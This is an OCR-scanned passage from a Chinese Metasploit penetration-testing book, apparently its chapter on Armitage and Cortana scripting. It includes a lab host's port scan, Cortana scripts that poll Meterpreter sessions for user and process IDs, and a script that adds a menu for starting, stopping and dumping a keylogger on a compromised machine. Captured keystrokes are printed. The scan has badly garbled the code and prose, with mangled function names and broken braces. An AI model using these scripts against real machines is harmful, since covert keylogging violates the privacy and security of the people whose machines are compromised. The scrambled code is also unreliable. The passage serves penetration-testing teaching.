192.168.10.109 445 tcp microsoft-ds open primary domain: WORKGROUP 
192.168.10.109 3389 tcp ssl/ms-wbt-server open 

192.168.10.109 8081 tcp http open  HttpFileServer httpd 2.3 
192.168.10.109 49152 tcp unknown open 

192.168.10.109 49153 tcp unknown open 

192.168.10.109 49154 tcp unknown open 

192.168.10.109 49155 tcp unknown open 

192.168.10.109 49156 tcp unknown open 

192.168.10.109 49157 tcp unknown open 

cortana» | 


很 明显 ， 命 令 的 输出 内 容 显 示 在 屏幕 上 。 到 这 里 可 以 结束 这 个 阶段 的 学 习 了 。 不 过 ， 要 想得到 
更 多 有 关 使 用 Cortana 脚 本 通过 Armitage 来 控制 Metasploit 的 信息 , 请 访问 http://www.Fastandeasyhacking. 
com/download/cortana/cortana tutorial.pdf。 


10.6.3 ”使 用 Cortana 实现 后 渗透 攻击 


oum uu mm 使 用 Cortana 内 置 的 功能 可 以 轻松 控制 后 渗透 
攻击 。 让 我 们 通过 下 面 的 示例 脚本 理解 这 一 点 。 


on heartbeat 15s { 
local('$sid') 

foreach $sid (session ids()) ( 
if (-iswinmeterpreter $sid && -isready $sid) ( 
m ecmd($sid, "getuid"); 

m ecmd($sid, "getpid"); 

on meterpreter getuid ( 
Printime $3 "Y; 

} 

on meterpreter getpid { 
peintim(" $3 "Y; 

} 


T e 
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在 这 个 脚本 中 ， 我 们 使 用 了 一 个 名 为 heartbeat_15s 的 函数 。 这 个 函数 每 隔 15 秒 会 重复 执 
行 一 次 。 因 此 ， 它 被 称 为 心跳 函数 (heart beat function )。 


函数 1ocal1 表 示 ssid 是 当前 函数 中 的 一 个 局 部 变量 .下 一 条 的 foreach 语 句 是 一 个 对 所 有 开 
放 会 话 的 循环 遍历 。 以 if 开始 的 语句 将 会 对 每 一 个 会 语 进行 检查 ， 检查 内 容 为 该 会 话 类 型 是 否 为 
Windows Meterpreter 控 制 ， 以 及 该 会 话 是 否 可 以 进行 交互 并 接受 命令 。 


m cma Zi Hi ssia ( 即 会 话 ID ) kie ADU OG cn a E UR RE, 我 们 
定义 了 一 个 meterpreter_x* 形 式 的 函数 ，* 意 味 着 即将 发 送 到 Meterpreter 会 话 的 命令 。 这 个 函数 
将 会 打印 sent 命 令 的 输出 ,正如 在 之 前 的 练习 中 console_hosts 和 console_services 所 做 的 
那样 。 


使 用 Cortana 载 和 人 这 个 脚本 ， 并 对 结果 进行 分 析 ， 如 下 图 所 示 。 


Server username: WIN-SWIKKOTKSHXNmm 
Current pid: 740 
Server username: WIN-SWIKKOTKSHX' umm 
Server username: WIN-SWIKKOTKSHX' umm 
Current pid: 740 
Current pid: 740 
Server username: WIN-SWIKKOTKSHX' umm 
Server username: WIN-SWIKKOTKSHX' mm 
Server username: WIN-SWIKKOTKSHX' unm 
Current pid: 740 


Current pid: 740 


Current pid: 740 


成 功 载 人 并 执行 了 这 段 脚 本 之 后 ， 每 隔 15 秒 就 会 显示 目标 系统 的 用 户 ID 和 当前 使 用 进程 的 
ID， 如 上 图 所 示 。 


有 关 Cortana 的 后 渗透 功能 、 脚 本 以 及 函数 的 更 多 信息 ， 请 访问 http://www. 
fastandeasyhacking.com/download/cortana/cortana tutorial.pdf. 


10.6.4 ”使 用 Cortana 创建 自 定 义 菜单 


通过 Meterpreter 会 话 成 功 连接 到 目标 计算 机 之 后 , Cortana 还 可 以 为 我 们 提供 构建 自 定 义 菜单 
的 功能 。 让 我 们 使 用 Cortana 来 创建 一 个 自 定 义 键盘 记录 器 ， 并 通过 分 析 以 下 脚本 来 了 解 Cortana 
脚本 的 工作 机 制 。 
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terpreter bottom ( 
{ 

t Key Logger" { 
"keyscan_start"); 


popup me 
menu "&My Key Logger" 
item "&Star 
m cmd($1, 
} 
item "&Stop Key Logger" { 
m cmd(S$1, "keyscan_ stop"); 
} 
item "&Show 
m cmd($1, 
} 

on meterpreter keyscan start { 
priutlnt" $3 *); 

} 
on meterpreter keyscan, stop { 
printlin(5-S3 "y 

} 
on meterpreter keyscan, dump { 
println(" $3- ")3 

} 

} 

} 


这 段 代码 实现 了 在 Meterpreter 子 菜单 中 创建 一 个 新 的 强 
目标 计算 机 并 取得 了 一 个 Meterpreter 命 令 行 时 ， 这 个 弹出 菜单 选项 才 是 可 月 


Keylogs" ( 
"keyscan, dump") ; 


RRRA, 不过， 只 有 成 功 渗透 了 


这 里 的 关键 字 popup 表 示 要 创建 一 个 
户 在 目标 计算 机 图 标 上 单 击 鼠 标 右键 并 选中 Meterpreter 时 ， 这 个 菜单 项 就 


弹出 式 菜 单项 , 而 函数 meterpreter_bottom 表 示 当 月 


目的 。 


会 出 现 。 关 键 字 ite 


指定 了 菜单 中 的 各 个 选项 。 命 令 m_cmg 会 根据 它们 对 应 编号 的 会 话 将 命令 发 送 给 Metasploit。 


此 ,在 这 段 代 码 中 ,我 们 有 三 个 选项 : Start Key Logger, Stop Key LoggerfllShow Keylogs。 
它们 分 别 用 来 开启 键盘 监听 器 、 停 止 键盘 监听 器 以 及 显示 当前 记录 中 的 键盘 监听 数据 。 我们 还 声 
明了 三 个 用 来 处 理发 送 给 Meterpreter 的 命令 输出 的 函数 。 现 在 在 Cortana 中 载 人 这 个 脚本 ， 成 功 渗 
透 目 标 计算 机 ， 然 后 在 目标 计算 机 的 图 标 上 单 击 鼠 标 右键 ， 这 时 将 会 出 现 如 下 图 所 示 的 菜单 。 


Access 
Interact 


Explore 
Pivoting 
My Key Logger 


Show Keylogs 


Start Key Logger 
Stop Key Logger 


我 们 会 发 现 ， 一 旦 在 被 渗透 了 的 主机 上 面 单 击 鼠 标 右 键 3 


浏览 Meterpreter 菜 单 ， 就 会 发 现 


这 里 多 了 一 个 新 的 菜单 选项 My Key Logger， 它 在 所 有 菜单 选项 的 最 下 方 。 这 个 菜单 选项 将 会 
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包含 我 们 声明 过 的 所 有 选项 
行 ， 将 会 在 Cortana 命 令 


一 旦 选择 了 这 个 菜单 中 的 某 一 个 选项 
行 中 显示 输出 。 


选择 


第 一 个 选项 Start Key DNA 然后 等 


， 它 对 应 的 命令 脚本 将 会 运 
待 一 段 时 间 , 


目标 将 在 此 期 间 使 用 键盘 完成 一 些 输入 操作 。 再 点 击 菜单 上 的 第 三 个 选项 ShowKeylogs， 如 下 


面 的 截图 所 示 。 


Access 


ortana X 


Services 
Scan 


Host 


bi Inantana Ibnulan nna 


单 击 了 Show Keylogs 菜 单 选 项 以 后 , 在 Cortana 控 制 台 上 将 会 


每 一 个 字符 ， 如 下 图 所 示 。 


Interact 
Explore 
Pivoting 
My Key Logger 


Start Key Logger 
Stop Key Logger 


Show Keylogs 


cortana» load /root/Desktop/cortana/key log.cna 
Load /root/Desktop/cortana/key log.cna 


Starting the keystroke sniffer... 


Starting the keystroke sniffer... 


Starting the keystroke sniffer... 


Dumping captured keystrokes... 
Dumping captured keystrokes... 
Dumping captured keystrokes... 
Dumping captured keystrokes... 

«LWin» r «Return» Hi «Back» 
«LWin» r «Return» Hi 


«LWin» r «Return» Hi 


«LWin» r «Return» Hi 


«Back» , 
«Back» , 


«Back» , 


, this system is compromised by armitage and Metasploit 
this system is compromised by armitage and Metasploit 
this system is compromised by armitage and Metasploit 


this system is compromised by armitage and Metasploit 


看 到 被 渗透 计算 机 的 使 用 者 输入 的 


10.6.5 ”界面 的 使 用 


在 需 


要 与 界面 协同 工作 的 时 候 'Cortana 也 提供 了 十 分 灵活 的 方法 和 一 


建 快 捷 方 式 、 图 标 ， 切 换 选 项 卡 等 。 
按 下 F1 键 的 时 候 ，Cortana 将 
bind F1 { 
$sid z"3"; 


spawn (&gu, 


} 


\$sid); 


会 显示 目标 主机 的 UID 值 。 


设想 一 下 ， 现 在 需要 添加 一 个 
让 我 们 看 一 


系列 选项 和 功能 用 来 创 
个 自 定义 功能 ， 当 我 们 在 键盘 上 
一 个 实现 了 这 个 功能 的 脚本 : 
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sub gut 

m cmd($sid,"getuid"); 
on meterpreter getuid ( 
show message( " $3 "); 
} 

} 


这 上段 程序 将 会 添加 一 个 快捷 键 F1。 当 这 个 快捷 键 被 按 下 的 时 候 , 系统 将 会 显示 当前 目标 系统 
的 UID 值 。 脚 本 中 的 关键 字 pinq 表 示 将 Fl1 键 与 函数 的 功能 绑 定 到 一 起 。 接 着 ， 我 们 定义 了 变量 
$sig 的 值 为 3( 这 个 值 是 我 们 将 要 进行 操作 的 会 话 ID )。 


函数 spawn 将 创建 一 个 新 的 Cortana 实 例 ， 执 行 gu 函 数 ， 并 将 值 Ssiq 设 定 为 这 个 实例 中 的 如 
局 变量 。 函 数 gu 会 向 Meterpreter 发 送 getuiaq 命 令 。 命 令 meterptretetr_getuid 会 处 理 命 令 
getuid 的 输出 。 


> 


rm 


命令 show_message 将 会 弹出 一 个 关于 命令 getuid 输 出 的 信息 。 现 在 将 新 脚本 加 载 到 
Armitage 中 ， 然 后 按 下 F1 键 检查 这 个 脚本 是 否 可 以 正常 执行 。 


Armitage View Hosts Attacks Workspaces Help 


> (lil auxiliary 
> (ll exploit 
* (lil payload 
> (ii post 


)9 


WIN- SWIKKOTKSHX 


Console X | Scripts X | Cortana X | nmap X 
cortana> load /root/Desktop/cortana/gu.cna 
Load /root/Desktop/cortana/gu. cna 
cortana> logon gu.cna 
Logging 'gu.cna' 
[00:35:04] meterpreter 3: 'getuid' at gu.cna:6 


Message 


"T Server username: WIN-SWIKKOTKSHXImm 


好 了 ! 我 们 轻松 获得 了 目标 系统 的 UID， 弹 出 的 信息 框 上 清楚 地 显示 了 UID 的 值 WwIN- 
SWIKKOTKSHX\mm。 关 于 使 用 Armitage 进 行 Cortana 脚 本 编写 的 讨论 到 此 结束 。 


有 关 Cortana 脚 本 编写 及 其 各 种 功能 的 更 多 信息 ， 请 访问 http://www. 
fastandeasyhacking.com/download/cortana/cortana tutorial.pdf, 
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10.7 ”小结 


在 这 一 章 中 ,我们 仔细 学 习 了 Armitage 及 其 各 种 功能 。 首 先 介绍 了 界面 和 工作 区 的 建立 ， 同 
时 讲解 了 如 何 使 用 Armitage 实 现 对 目标 主机 的 渗透 。 接 着 探讨 了 对 远程 主机 的 客户 端 攻击 和 后 渗 
透 攻 击 。 之 后 学 习 了 Cortana 和 它 的 基本 功能 ， 以 及 如 何 使 用 它 来 控制 Metasploit。 最 后 创建 了 后 
渗透 模块 、 自 定义 荣 单 以 及 界面 。 


10.8 延伸 阅读 


本 书 从 实际 应 用 的 角度 介绍 了 Metasploit 及 各 种 相关 主题 。 本 书 涵盖 了 渗透 模块 的 开发 、 模 
块 开发 、 渗 透 模块 的 移植 、 客 户 端 攻击 、Armitage 、 加 速 渗透 测试 和 测试 服务 等 内 容 。 本 书 还 介 
绍 了 汇编 语言 的 基础 知识 、Ruby 编 程 语言 和 Cortana 脚 本 语言 。 


读 完 本 书 之 后 ， 你 可 以 通过 下 面 的 资源 来 了 解 更 多 的 相关 信息 。 


口 如 果 想 学 习 有 关 Ruby 编 程 的 内 容 ， 请 访问 http:/ruby-doc.com/docs/ProgrammingRuby/。 

口 如 果 想 学 习 有 关 汇 编 语言 编程 的 内 容 ， 请 访问 https:/courses.engrillinois.edu/ece390/books/ 
artofasm/artofasm.html。 

口 如 果 想 学 习 有 关 渗 透 模块 开发 的 内 容 ， 请 访问 http://www.corelan.be。 

口 如 果 想 学 习 有 关 Metasploit 开 发 的 内 容 ， 请 访问 http://dev.Metasploit.com/redmine/projects/ 
framework/wiki/DeveloperGuide, 

口 如 果 想 学 习 有 关 SCADA 技 术 的 渗透 测试 的 内 容 ， 请 访问 http://www.scadahacker.com。 

口 如 果 想 获得 关于 Metasploit 的 详细 攻击 文档 ， 请 访问 http://www.offensive-security.com/ 
Metasploit-unleashed/Main Page; 

口 如 果 想 学 习 有 关 Cortana 的 脚本 编程 的 内 容 ， 请 访问 http://www.fastandeasyhacking.com/ 
download/cortana/cortana tutorial.pdf 。 

口 有 关 Cortana 脚 本 的 更 多 资源 ， 请 访问 https://github.com/rsmudge/cortana-scripts。 
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